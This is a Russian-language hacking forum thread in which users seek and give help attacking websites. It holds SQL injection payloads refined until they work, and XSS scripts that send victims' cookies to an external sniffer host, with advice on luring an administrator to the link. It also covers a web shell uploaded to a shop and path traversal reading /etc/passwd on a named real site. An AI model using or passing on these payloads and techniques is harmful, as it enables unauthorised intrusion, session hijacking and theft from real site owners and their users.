Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    Нет - если ты про бд.
     
  2. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    прошу помочь с скулем не могу раскрутит
    Code:
    https://localhost.com/account/signIn
    POST
    email=eeee%40eeeee.ee&signinfrom=private&password=pppppp'
    There was an SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''pppppp'' AND (c.password is not null AND c.password != '')' at line 4 - SELECT c.* FROM customer c WHERE c.email = '[email protected]' AND c.password = 'pppppp'' AND (c.password is not null AND c.password != '')
    Code:
    POST
    email=eeee%40eeeee.ee&signinfrom=private&password=pppppp' or 'x'='x'
    There was an SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''x'' AND (c.password is not null AND c.password != '')' at line 4 - SELECT c.* FROM customer c WHERE c.email = '[email protected]' AND c.password = 'pppppp' or 'x'='x'' AND (c.password is not null AND c.password != '')

    Code:
    POST
    email=eeee%40eeeee.ee&signinfrom=private&password=pppppp+or(1,2)=(select+count(*),concat((select+version()+from+information_schema.tables+limit+0,1),0x3a,floor(rand()*2))+from+information_schema.tables+group+by+2+limit+0,1)--+
    There was an SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'or(1,2)=(select+count(*),concat((select+version()+from+information_schema.tables' at line 4 - SELECT c.* FROM customer c WHERE c.email = '[email protected]' AND c.password = 'pppppp'+or(1,2)=(select+count(*),concat((select+version()+from+information_schema.tables+limit+0,1),0x3a,floor(rand()*2))+from+information_schema.tables+group+by+2+limit+0,1)--+' AND (c.password is not null AND c.password != '')
    тока email=eeee%40eeeee.ee&signinfrom=private&password=pppppp' or 'x'='x норм отображается но order by не катет
     
    #17602 YuNi|[c, 12 Aug 2011
    Last edited: 12 Aug 2011
  3. ridik77

    ridik77 New Member

    Joined:
    9 Aug 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    подскажите что делать дальше, на сайте вместо Username: и Password: ввожу этот скрипт "><script>alert(/xss/)</script> дальше выскакует окно /XSS/ жму ОК. в поле Username: стоит \\\\\\\\\\" на против этого поля это name=username> в адресной стороке это ххх.com/?a=login&say=invalid_login&username=\\"><script>al ert(/xss/)</script> подскажите что дальше?
     
  4. Gusev

    Gusev Banned

    Joined:
    4 Sep 2010
    Messages:
    86
    Likes Received:
    8
    Reputations:
    -5
    Кто то работал с сайтами ucoz (сейчас есть уязвимость по превод пользователей с категории в категорию) - много шума это поднимает сейчас

    ( у кого то скрипты есть )
     
  5. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    909
    Reputations:
    863
    Это дело называется пасивная XSS, ты можешь поставить где нить снифер, и подсунуть ссылку админу
    ххх.com/?a=login&say=invalid_login&username=\\"><script>document.location="SNIFFER"+document.cookie</script> за счет чего получишь админские куки и если повезет сможешь под его куками войти в админку
     
    _________________________
  6. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54

    Code:
    email=eeee%40eeeee.ee&signinfrom=private&password=pppppp'+or(1,2)=(select+count(*),concat((select+version()+from+information_schema.tables+limit+0,1),0x3a,floor(rand()*2))+from+information_schema.tables+group+by+2+limit+0,1) or 'x'='x
    Так попробуй (только не забудь удалить пробелы, которые форум подставляет)
     
  7. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    :(
    There was an SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'or(1,2)=(select+count(*),concat((select+version()+from+information_schema.tables' at line 4 - SELECT c.* FROM customer c WHERE c.email = '[email protected]' AND c.password = 'pppppp'+or(1,2)=(select+count(*),concat((select+version()+from+information_schema.tables+limit+0,1),0x3a,floor(rand()*2))+from+information_schema.tables+group+by+2+limit+0,1) or 'x'='x' AND (c.password is not null AND c.password != '')

    спс не подходит чет стукнул в пм
     
    #17607 YuNi|[c, 12 Aug 2011
    Last edited: 12 Aug 2011
  8. ridik77

    ridik77 New Member

    Joined:
    9 Aug 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    winstrool, это как поставить где нибуть снифер? я зареган на hacker-pro, здесь есть такой ява скрипт- <script>
    img = new Image(); img.src = "http://httpz.ru/nypbi4u80f5.gif?"+document.cookie;
    </script> и есть ява скрипт для адресной строки- javascript:document.write('<script>img = new Image(); img.src = "http://httpz.ru/nypbi4u80f5.gif?"+document.cookie;</script>')
    куда и как подставлять? куки должны сразу прейти или надо ждать?
     
  9. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    YuNi|[c, во первых - раз у тебя данные передаются _POST методом, то символ плюс (+) использовать не нужно, т.к. это аналог пробела, и в твоем случае этот символ попадает так как есть.
    во-вторых в конце обязательно нужен комментарий, в качестве которого достаточно использовать символ решетки (#)
    в-третьих попробуй так:
    Code:
    [email protected]&signinfrom=private&password=x'or(select(max(1))from(customer)group by(concat(version(),0x00,floor(rand(0)*2))))#
     
    _________________________
    1 person likes this.
  10. herfleisch

    herfleisch Elder - Старейшина

    Joined:
    7 Jan 2009
    Messages:
    579
    Likes Received:
    203
    Reputations:
    13
    Пытаюсь эксплуатировать Stack Overflow в обычном strcpy(). Успешно переписал адрес возврата из функции, но перед возвратом вызывается проверка:
    Code:
    call __security_check_cookie
    Есть ли способы её обойти?

    Windows XP
     
  11. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    909
    Reputations:
    863
    в твоем случае в адресную строку следовательно и скрипт нужно для адресной строки, такжже чтоб сильно глаза не резало, переведи в хекс, прийдется подождать пока админ перейдет по ссылке...

    P/S:вот подготовил код твоего снифака тебе остается подставить только название сайта:
     
    _________________________
    #17611 winstrool, 12 Aug 2011
    Last edited: 12 Aug 2011
  12. ridik77

    ridik77 New Member

    Joined:
    9 Aug 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    winstrool спасибо, ввел в адресною строку и поле Username: осталось а поле Password: исчезло.
    и еще я вводил скрипт не помню какой но выскочило это: PHP SESSID= 0bd2283e6ef3fb5919658b34c3b460ec что это?
     
  13. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Куки это. Обратись к стандартному мануалу по использованию XSS:
    http://ha.ckers.org/xss.html
    https://forum.antichat.ru/showthread.php?t=42326
    https://forum.antichat.ru/thread20140.html
     
  14. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    Собсно такой вопрос... в шопе к продукту вместо pdf файла залил шелл
    затем захожу в продукт и вижу свой файл мол shell.php, тыкаю по нему, мне вылазит мол сохранить файл.
    Сылка скачки фала такого вида
    http://site.com/getfile.php?id=346 можно ли как то определить где хранится сам файл что бы его выполнить?
     
  15. Koren

    Koren Member

    Joined:
    11 Jul 2009
    Messages:
    66
    Likes Received:
    20
    Reputations:
    1
    http://www.multiplaz.ru/download//..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd
    от этого можно получить что то большее? чем раскрытие путей
     
    2 people like this.
  16. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Скорее всего в базе
     
    _________________________
    1 person likes this.
  17. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    погомогите плз!
    собственно нашёл blind,но не могу раскрутить!
    Code:
    http://elecsnet.ru/search/?rid=23359
     
    1 person likes this.
  18. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    в каком месте тут скуль?
     
    1 person likes this.
  19. PATCH

    PATCH Member

    Joined:
    16 Jul 2011
    Messages:
    38
    Likes Received:
    5
    Reputations:
    11
    Интересует такой вопрос в книге по безопасности php говорилось допустим у нас есть запрос на выбору

    mysql_query ("SELECT * FROM user WHERE id='$id'");
    $id = числу но можно подставить следующие при должно проверки
    $id= 10 OR nick=ADMIN и запрос будет типа

    mysql_query ("SELECT * FROM user WHERE id='10 OR nick=ADMIN'");

    в вожу в адресной строке следующее
    http://site.ru/user.php?id=10 or nick=ADMIN

    почему не срабатывает? обработки id нету ибо я сам писал запрос
     
  20. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    у тебя в запросе ID передается как string (оно в ковычках), чтобы попасть в тело запроса, нужно сначало выйти за предела id, получится id='10' or nick='ADMIN'

    данный тип иньекции требует отключенный magic quotes
     
    _________________________
Thread Status:
Not open for further replies.